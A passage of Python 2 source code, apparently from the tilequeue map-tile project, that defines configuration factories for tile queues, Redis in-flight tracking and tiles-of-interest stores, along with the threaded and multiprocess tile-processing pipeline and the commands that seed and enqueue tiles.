    in-toi flag.
    """
    from tilequeue.queue.mapper import ZoomRangeAndZoomGroupQueueMapper
    from tilequeue.queue.mapper import ZoomRangeQueueSpec
    zoom_range_specs = []
    for spec_yaml in multi_queue_map_yaml:
        start_zoom = spec_yaml.get('start-zoom')
        end_zoom = spec_yaml.get('end-zoom')
        # a zoom range only applies when both endpoints are configured
        if start_zoom is None or end_zoom is None:
            start_zoom = end_zoom = None
        else:
            assert isinstance(start_zoom, int)
            assert isinstance(end_zoom, int)
            assert start_zoom < end_zoom
        queue_name = spec_yaml['queue-name']
        queue = tile_queue_name_map[queue_name]
        group_by_zoom = spec_yaml.get('group-by-zoom')
        in_toi = spec_yaml.get('in_toi')
        assert group_by_zoom is None or isinstance(group_by_zoom, int)
        zoom_range_specs.append(ZoomRangeQueueSpec(
            start_zoom, end_zoom, queue_name, queue, group_by_zoom,
            in_toi))
    return ZoomRangeAndZoomGroupQueueMapper(zoom_range_specs, toi=toi)
def make_single_queue_mapper(queue_name, tile_queue):
    """Wrap one named tile queue in a SingleQueueMapper."""
    from tilequeue.queue.mapper import SingleQueueMapper
    return SingleQueueMapper(queue_name, tile_queue)
def make_message_marshaller(msg_marshall_yaml_cfg):
    """Create a message marshaller from config: 'single' or 'multiple'."""
    msg_mar_type = msg_marshall_yaml_cfg.get('type')
    assert msg_mar_type, 'Missing message marshall type in config'
    if msg_mar_type == 'single':
        from tilequeue.queue.message import SingleMessageMarshaller
        return SingleMessageMarshaller()
    if msg_mar_type == 'multiple':
        # multiple coords per message, comma separated
        from tilequeue.queue.message import CommaSeparatedMarshaller
        return CommaSeparatedMarshaller()
    assert 0, 'Unknown message marshall type: %s' % msg_mar_type
def make_inflight_manager(inflight_yaml, redis_client=None):
    """Create the in-flight tracker; a no-op one when unconfigured.

    Only the 'redis' type is supported, and it requires a redis client.
    """
    if not inflight_yaml:
        from tilequeue.queue.inflight import NoopInFlightManager
        return NoopInFlightManager()
    inflight_type = inflight_yaml.get('type')
    assert inflight_type, 'Missing inflight type config'
    assert inflight_type == 'redis', \
        'Unknown inflight type: %s' % inflight_type
    assert redis_client, 'redis client required for redis inflight manager'
    # the redis key may be overridden via the config
    inflight_key = 'tilequeue.in-flight'
    redis_cfg = inflight_yaml.get('redis')
    if redis_cfg:
        inflight_key = redis_cfg.get('key') or inflight_key
    from tilequeue.queue.inflight import RedisInFlightManager
    return RedisInFlightManager(redis_client, inflight_key)
def make_visibility_mgr_from_cfg(visibility_yaml):
    """Build the SQS message-visibility manager from its config section."""
    assert visibility_yaml, 'Missing message-visibility config'
    extend_seconds = visibility_yaml.get('extend-seconds')
    assert extend_seconds > 0, \
        'Invalid message-visibility extend-seconds'
    max_seconds = visibility_yaml.get('max-seconds')
    assert max_seconds is not None, \
        'Invalid message-visibility max-seconds'
    timeout_seconds = visibility_yaml.get('timeout-seconds')
    assert timeout_seconds is not None, \
        'Invalid message-visibility timeout-seconds'
    return make_visibility_manager(
        extend_seconds, max_seconds, timeout_seconds)
def make_sqs_queue_from_cfg(name, queue_yaml_cfg, visibility_mgr):
    """Create an SQS tile queue; the config must carry a region."""
    region = queue_yaml_cfg.get('region')
    assert region, 'Missing queue sqs region'
    return make_sqs_queue(name, region, visibility_mgr)
def make_tile_queue(queue_yaml_cfg, all_cfg, redis_client=None):
    """Create tile queue(s) from yaml config.

    Returns a (tile_queue, name) pair, or - when given a list of queue
    configs - a list of such pairs (via recursion). Supported types:
    'sqs', 'mem', 'file', 'stdout', 'redis'.
    """
    # return a tile_queue, name instance, or list of tilequeue, name pairs
    # alternatively maybe should force queue implementations to know
    # about their names?
    if isinstance(queue_yaml_cfg, list):
        result = []
        for queue_item_cfg in queue_yaml_cfg:
            tile_queue, name = make_tile_queue(
                queue_item_cfg, all_cfg, redis_client)
            result.append((tile_queue, name))
        return result
    else:
        queue_name = queue_yaml_cfg.get('name')
        assert queue_name, 'Missing queue name'
        queue_type = queue_yaml_cfg.get('type')
        assert queue_type, 'Missing queue type'
        if queue_type == 'sqs':
            sqs_cfg = queue_yaml_cfg.get('sqs')
            assert sqs_cfg, 'Missing queue sqs config'
            # visibility config lives at the top level, not per-queue
            visibility_yaml = all_cfg.get('message-visibility')
            visibility_mgr = make_visibility_mgr_from_cfg(visibility_yaml)
            tile_queue = make_sqs_queue_from_cfg(queue_name, sqs_cfg,
                                                 visibility_mgr)
        elif queue_type == 'mem':
            from tilequeue.queue import MemoryQueue
            tile_queue = MemoryQueue()
        elif queue_type == 'file':
            # for the file type, the queue name doubles as the file path
            from tilequeue.queue import OutputFileQueue
            if os.path.exists(queue_name):
                assert os.path.isfile(queue_name), \
                    ('Could not create file queue. `./{}` is not a '
                     'file!'.format(queue_name))
            # handle intentionally left open: ownership passes to the
            # long-lived OutputFileQueue
            fp = open(queue_name, 'a+')
            tile_queue = OutputFileQueue(fp)
        elif queue_type == 'stdout':
            # only support writing
            from tilequeue.queue import OutputFileQueue
            tile_queue = OutputFileQueue(sys.stdout)
        elif queue_type == 'redis':
            assert redis_client, 'redis_client required for redis tile_queue'
            from tilequeue.queue import make_redis_queue
            tile_queue = make_redis_queue(redis_client, queue_name)
        else:
            raise ValueError('Unknown queue type: %s' % queue_type)
        return tile_queue, queue_name
def make_msg_tracker(msg_tracker_yaml, logger):
    """Create a message tracker; defaults to single-message-per-coord."""
    if not msg_tracker_yaml:
        from tilequeue.queue.message import SingleMessagePerCoordTracker
        return SingleMessagePerCoordTracker()
    msg_tracker_type = msg_tracker_yaml.get('type')
    assert msg_tracker_type, 'Missing message tracker type'
    if msg_tracker_type == 'single':
        from tilequeue.queue.message import SingleMessagePerCoordTracker
        return SingleMessagePerCoordTracker()
    if msg_tracker_type == 'multiple':
        from tilequeue.queue.message import MultipleMessagesPerCoordTracker
        from tilequeue.log import MultipleMessagesTrackerLogger
        msg_tracker_logger = MultipleMessagesTrackerLogger(logger)
        return MultipleMessagesPerCoordTracker(msg_tracker_logger)
    assert 0, 'Unknown message tracker type: %s' % msg_tracker_type
def make_toi_helper(cfg):
    """Create the tiles-of-interest store from cfg.toi_store_type.

    Supports 's3' and 'file'. Raises AssertionError for anything else;
    the original silently returned None, deferring the failure to the
    call site (all the other factories here assert on unknown types).
    """
    if cfg.toi_store_type == 's3':
        from tilequeue.toi import S3TilesOfInterestSet
        return S3TilesOfInterestSet(
            cfg.toi_store_s3_bucket,
            cfg.toi_store_s3_key,
        )
    elif cfg.toi_store_type == 'file':
        from tilequeue.toi import FileTilesOfInterestSet
        return FileTilesOfInterestSet(
            cfg.toi_store_file_name,
        )
    else:
        assert 0, 'Unknown toi store type: %s' % cfg.toi_store_type
def make_redis_client(cfg):
    """Create a StrictRedis client from the config's host, port and db."""
    from redis import StrictRedis
    return StrictRedis(cfg.redis_host, cfg.redis_port, cfg.redis_db)
def make_logger(cfg, logger_name, loglevel=logging.INFO):
    """Return the named logger set to *loglevel*.

    If the config carries a `logconfig` fileConfig path, apply it first.
    Bug fix: getattr() is given a default of None so a config object
    without a `logconfig` attribute no longer raises AttributeError.
    """
    if getattr(cfg, 'logconfig', None) is not None:
        logging.config.fileConfig(cfg.logconfig)
    logger = logging.getLogger(logger_name)
    logger.setLevel(loglevel)
    return logger
def make_seed_tile_generator(cfg):
    """Build a generator of seed tile coordinates from the config.

    Chains up to four sources: a full zoom range, metro-extract city
    bounds (fetched over HTTP), a top-tiles list (fetched over HTTP)
    and custom bounding boxes. When cfg.seed_unique is set, duplicates
    are removed (at the cost of materializing the whole stream).
    """
    if cfg.seed_all_zoom_start is not None:
        assert cfg.seed_all_zoom_until is not None
        all_tiles = seed_tiles(cfg.seed_all_zoom_start,
                               cfg.seed_all_zoom_until)
    else:
        all_tiles = ()
    if cfg.seed_metro_extract_url:
        assert cfg.seed_metro_extract_zoom_start is not None
        assert cfg.seed_metro_extract_zoom_until is not None
        with closing(urlopen(cfg.seed_metro_extract_url)) as fp:
            # will raise a MetroExtractParseError on failure
            metro_extracts = parse_metro_extract(fp)
        city_filter = cfg.seed_metro_extract_cities
        if city_filter is not None:
            # keep only the configured cities
            metro_extracts = [
                city for city in metro_extracts if city.city in city_filter]
        multiple_bounds = city_bounds(metro_extracts)
        metro_extract_tiles = tile_generator_for_multiple_bounds(
            multiple_bounds, cfg.seed_metro_extract_zoom_start,
            cfg.seed_metro_extract_zoom_until)
    else:
        metro_extract_tiles = ()
    if cfg.seed_top_tiles_url:
        assert cfg.seed_top_tiles_zoom_start is not None
        assert cfg.seed_top_tiles_zoom_until is not None
        with closing(urlopen(cfg.seed_top_tiles_url)) as fp:
            top_tiles = parse_top_tiles(
                fp, cfg.seed_top_tiles_zoom_start,
                cfg.seed_top_tiles_zoom_until)
    else:
        top_tiles = ()
    if cfg.seed_custom_bboxes:
        assert cfg.seed_custom_zoom_start is not None
        assert cfg.seed_custom_zoom_until is not None
        custom_tiles = tile_generator_for_multiple_bounds(
            cfg.seed_custom_bboxes, cfg.seed_custom_zoom_start,
            cfg.seed_custom_zoom_until)
    else:
        custom_tiles = ()
    # lazily concatenate all configured sources
    combined_tiles = chain(
        all_tiles, metro_extract_tiles, top_tiles, custom_tiles)
    if cfg.seed_unique:
        tile_generator = uniquify_generator(combined_tiles)
    else:
        tile_generator = combined_tiles
    return tile_generator
def _make_store(cfg,
                s3_role_arn=None,
                s3_role_session_duration_s=None,
                logger=None):
    """Create the tile store declared under cfg.yml['store'].

    A 'process' logger is created when none is supplied.
    """
    store_cfg = cfg.yml.get('store')
    assert store_cfg, "Store was not configured, but is necessary."
    if logger is None:
        logger = make_logger(cfg, 'process')
    return make_store(store_cfg,
                      s3_role_arn=s3_role_arn,
                      s3_role_session_duration_s=s3_role_session_duration_s,
                      logger=logger)
def explode_and_intersect(coord_ints, tiles_of_interest, until=0):
    """Intersect coords (walking up the zoom pyramid) with the TOI.

    Each coordinate int is tested against tiles_of_interest; misses are
    replaced by their parent coordinate and retried on the next pass,
    until the `until` zoom is reached. Returns (matched coord ints,
    metrics dict with total/hits/misses/n_toi counts).
    """
    next_coord_ints = coord_ints
    coord_ints_at_parent_zoom = set()
    total_coord_ints = []
    # to capture metrics
    total = 0
    hits = 0
    misses = 0
    while True:
        for coord_int in next_coord_ints:
            total += 1
            if coord_int in tiles_of_interest:
                hits += 1
                total_coord_ints.append(coord_int)
            else:
                misses += 1
                # on a miss, queue the parent for the next pass unless
                # we are already at the lowest zoom to consider
                zoom = zoom_mask & coord_int
                if zoom > until:
                    parent_coord_int = coord_int_zoom_up(coord_int)
                    coord_ints_at_parent_zoom.add(parent_coord_int)
        # fixed point: no more parents to test
        if not coord_ints_at_parent_zoom:
            break
        next_coord_ints = coord_ints_at_parent_zoom
        coord_ints_at_parent_zoom = set()
    metrics = dict(
        total=total,
        hits=hits,
        misses=misses,
        n_toi=len(tiles_of_interest),
    )
    return total_coord_ints, metrics
def coord_ints_from_paths(paths):
    """Read coordinate files and union their contents as marshalled ints.

    Returns a dict with 'coord_set' (the set of coord ints) and
    'path_counts' ((path, coord count) pairs in input order).
    """
    coord_set = set()
    path_counts = []
    for path in paths:
        n_path_coords = 0
        with open(path) as fh:
            for coord in create_coords_generator_from_tiles_file(fh):
                coord_set.add(coord_marshall_int(coord))
                n_path_coords += 1
        path_counts.append((path, n_path_coords))
    return dict(
        coord_set=coord_set,
        path_counts=path_counts,
    )
def _parse_postprocess_resources(post_process_item, cfg_path):
    """Initialize the 'resources' declared by one post-process item.

    Each resource config names an init function (dotted path) and, for
    the only supported type 'file', a path relative to cfg_path. The
    resource value is the init function applied to the open file.
    """
    resources_cfg = post_process_item.get('resources', {})
    resources = {}
    # NOTE: .iteritems() - this module targets Python 2 (see the
    # urllib2/Queue imports at the top of the file)
    for resource_name, resource_cfg in resources_cfg.iteritems():
        resource_type = resource_cfg.get('type')
        init_fn_name = resource_cfg.get('init_fn')
        assert resource_type, 'Missing type in resource %r' \
            % resource_name
        assert init_fn_name, 'Missing init function name in ' \
            'resource %r' % resource_name
        try:
            fn = resolve(init_fn_name)
        except Exception:
            # include the original traceback text in the new message
            raise Exception('Unable to init resource %r with function %r due '
                            'to %s' % (resource_name, init_fn_name,
                                       "".join(traceback.format_exception(
                                           *sys.exc_info()))))
        if resource_type == 'file':
            path = resource_cfg.get('path')
            assert path, 'Resource %r of type file is missing the ' \
                'path parameter' % resource_name
            with open(os.path.join(cfg_path, path), 'r') as fh:
                resources[resource_name] = fn(fh)
        else:
            raise Exception('Resource type %r is not supported'
                            % resource_type)
    return resources
# sources: the configured data sources; queries_generator: callable that
# produces the queries to run against them
SourcesConfig = namedtuple('SourcesConfig', 'sources queries_generator')
def parse_layer_data(query_cfg, buffer_cfg, cfg_path):
    """Parse the query config into layer and post-process descriptors.

    Returns (all_layer_data, layer_data, post_process_data), where
    all_layer_data is the subset of layer_data whose names appear in
    the config's 'all' list.
    """
    all_layer_names = query_cfg['all']
    layers_config = query_cfg['layers']
    post_process_config = query_cfg.get('post_process', [])
    layer_data = []
    all_layer_data = []
    post_process_data = []
    for layer_name, layer_config in layers_config.items():
        layer_datum = dict(
            name=layer_name,
            is_clipped=layer_config.get('clip', True),
            clip_factor=layer_config.get('clip_factor', 1.0),
            geometry_types=layer_config['geometry_types'],
            transform_fn_names=layer_config.get('transform', []),
            sort_fn_name=layer_config.get('sort'),
            simplify_before_intersect=layer_config.get(
                'simplify_before_intersect', False),
            simplify_start=layer_config.get('simplify_start', 0),
            area_threshold=int(
                layer_config.get('area-inclusion-threshold', 1)),
            query_bounds_pad_fn=create_query_bounds_pad_fn(
                buffer_cfg, layer_name),
            tolerance=float(layer_config.get('tolerance', 1.0)),
        )
        layer_data.append(layer_datum)
        if layer_name in all_layer_names:
            all_layer_data.append(layer_datum)
    for post_process_item in post_process_config:
        fn_name = post_process_item.get('fn')
        assert fn_name, 'Missing post process config fn'
        params = post_process_item.get('params')
        if params is None:
            params = {}
        resources = _parse_postprocess_resources(post_process_item, cfg_path)
        post_process_data.append(dict(
            fn_name=fn_name,
            params=dict(params),
            resources=resources))
    return all_layer_data, layer_data, post_process_data
def make_output_calc_mapping(process_yaml_cfg):
    """Build the layer-name -> output-calculation-function mapping.

    Config type 'parse' compiles the functions from a yaml directory;
    'callable' resolves a dotted name and calls it with the configured
    args. Anything else raises ValueError.
    """
    cfg_type = process_yaml_cfg['type']
    if cfg_type == 'parse':
        parse_cfg = process_yaml_cfg['parse']
        yaml_path = parse_cfg['path']
        assert os.path.isdir(yaml_path), 'Invalid yaml path: %s' % yaml_path
        from vectordatasource.meta.python import make_function_name_props
        from vectordatasource.meta.python import output_kind
        from vectordatasource.meta.python import parse_layers
        layer_parse_result = parse_layers(
            yaml_path, output_kind, make_function_name_props)
        return {layer_datum.layer: layer_datum.fn
                for layer_datum in layer_parse_result.layer_data}
    if cfg_type == 'callable':
        callable_cfg = process_yaml_cfg['callable']
        fn = resolve(callable_cfg['dotted-name'])
        return fn(*callable_cfg['args'])
    raise ValueError('Invalid process yaml config: %s' % process_yaml_cfg)
def make_min_zoom_calc_mapping(process_yaml_cfg):
    """Build the layer-name -> min-zoom-calculation-function mapping."""
    # can't handle "callable" type - how do we get the min zoom fn?
    assert process_yaml_cfg['type'] == 'parse'
    yaml_path = process_yaml_cfg['parse']['path']
    assert os.path.isdir(yaml_path), 'Invalid yaml path: %s' % yaml_path
    from vectordatasource.meta.python import make_function_name_min_zoom
    from vectordatasource.meta.python import output_min_zoom
    from vectordatasource.meta.python import parse_layers
    layer_parse_result = parse_layers(
        yaml_path, output_min_zoom, make_function_name_min_zoom)
    return {layer_datum.layer: layer_datum.fn
            for layer_datum in layer_parse_result.layer_data}
def tilequeue_process(cfg, peripherals):
    """Run the tile-processing pipeline until terminated by a signal.

    Wires up a multi-stage pipeline connected by queues:
      tile queue reader (thread) -> data fetchers (threads) ->
      data processors (one process per cpu) -> s3 storage (threads) ->
      tile queue writer (thread).
    Never returns normally: the main thread sleeps forever and the
    process exits via the stop_all_workers() signal handler on
    SIGTERM/SIGINT/SIGQUIT.
    """
    from tilequeue.log import JsonTileProcessingLogger
    logger = make_logger(cfg, 'process')
    tile_proc_logger = JsonTileProcessingLogger(logger)
    tile_proc_logger.lifecycle('tilequeue processing started')
    assert os.path.exists(cfg.query_cfg), \
        'Invalid query config path'
    with open(cfg.query_cfg) as query_cfg_fp:
        query_cfg = yaml.load(query_cfg_fp)
    all_layer_data, layer_data, post_process_data = (
        parse_layer_data(
            query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
    formats = lookup_formats(cfg.output_formats)
    store = _make_store(cfg)
    assert cfg.postgresql_conn_info, 'Missing postgresql connection info'
    from shapely import speedups
    if speedups.available:
        speedups.enable()
        tile_proc_logger.lifecycle('Shapely speedups enabled')
    else:
        tile_proc_logger.lifecycle(
            'Shapely speedups not enabled, they were not available')
    output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
    n_cpu = multiprocessing.cpu_count()
    n_simultaneous_query_sets = cfg.n_simultaneous_query_sets
    if not n_simultaneous_query_sets:
        # default to number of databases configured
        n_simultaneous_query_sets = len(cfg.postgresql_conn_info['dbnames'])
    assert n_simultaneous_query_sets > 0
    # reduce queue size when we're rendering metatiles to try and avoid the
    # geometry waiting to be processed from taking up all the RAM!
    size_sqr = (cfg.metatile_size or 1)**2
    # NOTE(review): Python 2 integer division - 16 / size_sqr truncates
    default_queue_buffer_size = max(1, 16 / size_sqr)
    sql_queue_buffer_size = cfg.sql_queue_buffer_size or \
        default_queue_buffer_size
    proc_queue_buffer_size = cfg.proc_queue_buffer_size or \
        default_queue_buffer_size
    s3_queue_buffer_size = cfg.s3_queue_buffer_size or \
        default_queue_buffer_size
    n_layers = len(all_layer_data)
    n_formats = len(formats)
    n_simultaneous_s3_storage = cfg.n_simultaneous_s3_storage
    if not n_simultaneous_s3_storage:
        n_simultaneous_s3_storage = max(n_cpu / 2, 1)
    assert n_simultaneous_s3_storage > 0
    # thread pool used for queries and uploading to s3
    n_total_needed_query = n_layers * n_simultaneous_query_sets
    n_total_needed_s3 = n_formats * n_simultaneous_s3_storage
    n_total_needed = n_total_needed_query + n_total_needed_s3
    n_max_io_workers = 50
    n_io_workers = min(n_total_needed, n_max_io_workers)
    io_pool = ThreadPool(n_io_workers)
    feature_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
    # create all queues used to manage pipeline
    # holds coordinate messages from tile queue reader
    # TODO can move this hardcoded value to configuration
    # having a little less than the value is beneficial
    # ie prefer to read on-demand from queue rather than hold messages
    # in waiting while others are processed, can become stale faster
    tile_input_queue = Queue.Queue(10)
    # holds raw sql results - no filtering or processing done on them
    sql_data_fetch_queue = multiprocessing.Queue(sql_queue_buffer_size)
    # holds data after it has been filtered and processed
    # this is where the cpu intensive part of the operation will happen
    # the results will be data that is formatted for each necessary format
    processor_queue = multiprocessing.Queue(proc_queue_buffer_size)
    # holds data after it has been sent to s3
    s3_store_queue = Queue.Queue(s3_queue_buffer_size)
    # create worker threads/processes
    thread_tile_queue_reader_stop = threading.Event()
    queue_mapper = peripherals.queue_mapper
    msg_marshaller = peripherals.msg_marshaller
    msg_tracker_yaml = cfg.yml.get('message-tracker')
    msg_tracker = make_msg_tracker(msg_tracker_yaml, logger)
    from tilequeue.stats import TileProcessingStatsHandler
    stats_handler = TileProcessingStatsHandler(peripherals.stats)
    tile_queue_reader = TileQueueReader(
        queue_mapper, msg_marshaller, msg_tracker, tile_input_queue,
        tile_proc_logger, stats_handler, thread_tile_queue_reader_stop,
        cfg.max_zoom, cfg.group_by_zoom)
    data_fetch = DataFetch(
        feature_fetcher, tile_input_queue, sql_data_fetch_queue, io_pool,
        tile_proc_logger, stats_handler, cfg.metatile_zoom, cfg.max_zoom,
        cfg.metatile_start_zoom)
    data_processor = ProcessAndFormatData(
        post_process_data, formats, sql_data_fetch_queue, processor_queue,
        cfg.buffer_cfg, output_calc_mapping, layer_data, tile_proc_logger,
        stats_handler)
    s3_storage = S3Storage(processor_queue, s3_store_queue, io_pool, store,
                           tile_proc_logger, cfg.metatile_size)
    thread_tile_writer_stop = threading.Event()
    tile_queue_writer = TileQueueWriter(
        queue_mapper, s3_store_queue, peripherals.inflight_mgr,
        msg_tracker, tile_proc_logger, stats_handler,
        thread_tile_writer_stop)

    def create_and_start_thread(fn, *args):
        # helper: spawn and start a thread running fn(*args)
        t = threading.Thread(target=fn, args=args)
        t.start()
        return t

    thread_tile_queue_reader = create_and_start_thread(tile_queue_reader)
    threads_data_fetch = []
    threads_data_fetch_stop = []
    for i in range(n_simultaneous_query_sets):
        thread_data_fetch_stop = threading.Event()
        thread_data_fetch = create_and_start_thread(data_fetch,
                                                    thread_data_fetch_stop)
        threads_data_fetch.append(thread_data_fetch)
        threads_data_fetch_stop.append(thread_data_fetch_stop)
    # create a data processor per cpu
    n_data_processors = n_cpu
    data_processors = []
    data_processors_stop = []
    for i in range(n_data_processors):
        data_processor_stop = multiprocessing.Event()
        process_data_processor = multiprocessing.Process(
            target=data_processor, args=(data_processor_stop,))
        process_data_processor.start()
        data_processors.append(process_data_processor)
        data_processors_stop.append(data_processor_stop)
    threads_s3_storage = []
    threads_s3_storage_stop = []
    for i in range(n_simultaneous_s3_storage):
        thread_s3_storage_stop = threading.Event()
        thread_s3_storage = create_and_start_thread(s3_storage,
                                                    thread_s3_storage_stop)
        threads_s3_storage.append(thread_s3_storage)
        threads_s3_storage_stop.append(thread_s3_storage_stop)
    thread_tile_writer = create_and_start_thread(tile_queue_writer)
    if cfg.log_queue_sizes:
        assert(cfg.log_queue_sizes_interval_seconds > 0)
        queue_data = (
            (tile_input_queue, 'queue'),
            (sql_data_fetch_queue, 'sql'),
            (processor_queue, 'proc'),
            (s3_store_queue, 's3'),
        )
        queue_printer_thread_stop = threading.Event()
        queue_printer = QueuePrint(
            cfg.log_queue_sizes_interval_seconds, queue_data, tile_proc_logger,
            queue_printer_thread_stop)
        queue_printer_thread = create_and_start_thread(queue_printer)
    else:
        queue_printer_thread = None
        queue_printer_thread_stop = None

    def stop_all_workers(signum, stack):
        # signal handler: drain and join every stage in pipeline order,
        # then exit the process
        tile_proc_logger.lifecycle('tilequeue processing shutdown ...')
        tile_proc_logger.lifecycle(
            'requesting all workers (threads and processes) stop ...')
        # each worker guards its read loop with an event object
        # ask all these to stop first
        thread_tile_queue_reader_stop.set()
        for thread_data_fetch_stop in threads_data_fetch_stop:
            thread_data_fetch_stop.set()
        for data_processor_stop in data_processors_stop:
            data_processor_stop.set()
        for thread_s3_storage_stop in threads_s3_storage_stop:
            thread_s3_storage_stop.set()
        thread_tile_writer_stop.set()
        if queue_printer_thread_stop:
            queue_printer_thread_stop.set()
        tile_proc_logger.lifecycle(
            'requesting all workers (threads and processes) stop ... done')
        # Once workers receive a stop event, they will keep reading
        # from their queues until they receive a sentinel value. This
        # is mandatory so that no messages will remain on queues when
        # asked to join. Otherwise, we never terminate.
        tile_proc_logger.lifecycle('joining all workers ...')
        tile_proc_logger.lifecycle('joining tile queue reader ...')
        thread_tile_queue_reader.join()
        tile_proc_logger.lifecycle('joining tile queue reader ... done')
        tile_proc_logger.lifecycle(
            'enqueueing sentinels for data fetchers ...')
        for i in range(len(threads_data_fetch)):
            tile_input_queue.put(None)
        tile_proc_logger.lifecycle(
            'enqueueing sentinels for data fetchers ... done')
        tile_proc_logger.lifecycle('joining data fetchers ...')
        for thread_data_fetch in threads_data_fetch:
            thread_data_fetch.join()
        tile_proc_logger.lifecycle('joining data fetchers ... done')
        tile_proc_logger.lifecycle(
            'enqueueing sentinels for data processors ...')
        for i in range(len(data_processors)):
            sql_data_fetch_queue.put(None)
        tile_proc_logger.lifecycle(
            'enqueueing sentinels for data processors ... done')
        tile_proc_logger.lifecycle('joining data processors ...')
        for data_processor in data_processors:
            data_processor.join()
        tile_proc_logger.lifecycle('joining data processors ... done')
        tile_proc_logger.lifecycle('enqueueing sentinels for s3 storage ...')
        for i in range(len(threads_s3_storage)):
            processor_queue.put(None)
        tile_proc_logger.lifecycle(
            'enqueueing sentinels for s3 storage ... done')
        tile_proc_logger.lifecycle('joining s3 storage ...')
        for thread_s3_storage in threads_s3_storage:
            thread_s3_storage.join()
        tile_proc_logger.lifecycle('joining s3 storage ... done')
        tile_proc_logger.lifecycle(
            'enqueueing sentinel for tile queue writer ...')
        s3_store_queue.put(None)
        tile_proc_logger.lifecycle(
            'enqueueing sentinel for tile queue writer ... done')
        tile_proc_logger.lifecycle('joining tile queue writer ...')
        thread_tile_writer.join()
        tile_proc_logger.lifecycle('joining tile queue writer ... done')
        if queue_printer_thread:
            tile_proc_logger.lifecycle('joining queue printer ...')
            queue_printer_thread.join()
            tile_proc_logger.lifecycle('joining queue printer ... done')
        tile_proc_logger.lifecycle('joining all workers ... done')
        tile_proc_logger.lifecycle('joining io pool ...')
        io_pool.close()
        io_pool.join()
        tile_proc_logger.lifecycle('joining io pool ... done')
        tile_proc_logger.lifecycle('joining multiprocess data fetch queue ...')
        sql_data_fetch_queue.close()
        sql_data_fetch_queue.join_thread()
        tile_proc_logger.lifecycle(
            'joining multiprocess data fetch queue ... done')
        tile_proc_logger.lifecycle('joining multiprocess process queue ...')
        processor_queue.close()
        processor_queue.join_thread()
        tile_proc_logger.lifecycle(
            'joining multiprocess process queue ... done')
        tile_proc_logger.lifecycle('tilequeue processing shutdown ... done')
        sys.exit(0)

    signal.signal(signal.SIGTERM, stop_all_workers)
    signal.signal(signal.SIGINT, stop_all_workers)
    signal.signal(signal.SIGQUIT, stop_all_workers)
    tile_proc_logger.lifecycle('all tilequeue threads and processes started')
    # this is necessary for the main thread to receive signals
    # when joining on threads/processes, the signal is never received
    # http://www.luke.maurits.id.au/blog/post/threads-and-signals-in-python.html
    while True:
        time.sleep(1024)
def coords_generator_from_queue(queue):
    """Yield coordinates read from *queue* until a None sentinel is seen."""
    while True:
        coord = queue.get()
        if coord is None:
            return
        yield coord
def tilequeue_seed(cfg, peripherals):
    """Generate seed tiles and enqueue them, optionally adding to the TOI.

    Coordinates stream through a bounded queue to a background thread
    that performs the batch enqueue; a None sentinel terminates it.
    """
    logger = make_logger(cfg, 'seed')
    logger.info('Seeding tiles ...')
    queue_writer = peripherals.queue_writer
    # based on cfg, create tile generator
    tile_generator = make_seed_tile_generator(cfg)
    queue_buf_size = 1024
    tile_queue_queue = Queue.Queue(queue_buf_size)

    # updating tile queue happens in background threads
    def tile_queue_enqueue():
        coords = coords_generator_from_queue(tile_queue_queue)
        queue_writer.enqueue_batch(coords)

    logger.info('Enqueueing ... ')
    thread_enqueue = threading.Thread(target=tile_queue_enqueue)
    thread_enqueue.start()
    n_coords = 0
    for coord in tile_generator:
        tile_queue_queue.put(coord)
        n_coords += 1
        if n_coords % 100000 == 0:
            logger.info('%d enqueued' % n_coords)
    # None sentinel stops the background enqueue thread
    tile_queue_queue.put(None)
    thread_enqueue.join()
    logger.info('Enqueueing ... done')
    if cfg.seed_should_add_to_tiles_of_interest:
        logger.info('Adding to Tiles of Interest ... ')
        if (cfg.toi_store_type == 'file' and
                not os.path.exists(cfg.toi_store_file_name)):
            toi_set = set()
        else:
            toi_set = peripherals.toi.fetch_tiles_of_interest()
        # the first generator is exhausted by now, so build a fresh one
        tile_generator = make_seed_tile_generator(cfg)
        for coord in tile_generator:
            coord_int = coord_marshall_int(coord)
            toi_set.add(coord_int)
        peripherals.toi.set_tiles_of_interest(toi_set)
        emit_toi_stats(toi_set, peripherals)
        logger.info('Adding to Tiles of Interest ... done')
    logger.info('Seeding tiles ... done')
    logger.info('%d coordinates enqueued' % n_coords)
def tilequeue_enqueue_tiles_of_interest(cfg, peripherals):
    """Enqueue every tile of interest at or below the configured max zoom."""
    logger = make_logger(cfg, 'enqueue_tiles_of_interest')
    logger.info('Enqueueing tiles of interest')
    logger.info('Fetching tiles of interest ...')
    toi = peripherals.toi.fetch_tiles_of_interest()
    n_toi = len(toi)
    logger.info('Fetching tiles of interest ... done')
    # unmarshall and drop anything deeper than the maximum renderable zoom
    coords = [
        coord for coord in
        (coord_unmarshall_int(coord_int) for coord_int in toi)
        if coord.zoom <= cfg.max_zoom
    ]
    n_queued, n_in_flight = peripherals.queue_writer.enqueue_batch(coords)
    logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
    logger.info('%d tiles of interest processed' % n_toi)
def tilequeue_enqueue_stdin(cfg, peripherals):
    """Read newline-delimited coordinates from stdin and enqueue them."""
    logger = make_logger(cfg, 'enqueue_stdin')

    def _stdin_coord_generator():
        # silently skip lines that do not parse as coordinates
        for raw_line in sys.stdin:
            parsed = deserialize_coord(raw_line.strip())
            if parsed is not None:
                yield parsed

    n_queued, n_in_flight = peripherals.queue_writer.enqueue_batch(
        _stdin_coord_generator())
    logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
def coord_pyramid(coord, zoom_start, zoom_stop):
    """
    generate full pyramid for coord

    Yields the coordinate itself and all children down to zoom_stop
    (exclusive), filtered to zooms >= zoom_start.
    """
    candidates = chain([coord], coord_children_range(coord, zoom_stop))
    for candidate in candidates:
        if zoom_start <= candidate.zoom:
            yield candidate
def coord_pyramids(coords, zoom_start, zoom_stop):
    """
    generate full pyramid for coords

    Flattens coord_pyramid over every coordinate in coords; zoom_stop is
    exclusive.
    """
    per_coord = (coord_pyramid(c, zoom_start, zoom_stop) for c in coords)
    for member in chain.from_iterable(per_coord):
        yield member
def tilequeue_enqueue_full_pyramid_from_toi(cfg, peripherals, args):
    """enqueue a full pyramid from the z10 toi

    TOI members shallower than zoom_start are enqueued as-is
    ("ungrouped").  Members at or deeper than the RAWR group-by zoom are
    snapped up to that zoom, deduplicated, and the full pyramid from
    zoom_start to zoom_stop (exclusive) is enqueued for each one.
    """
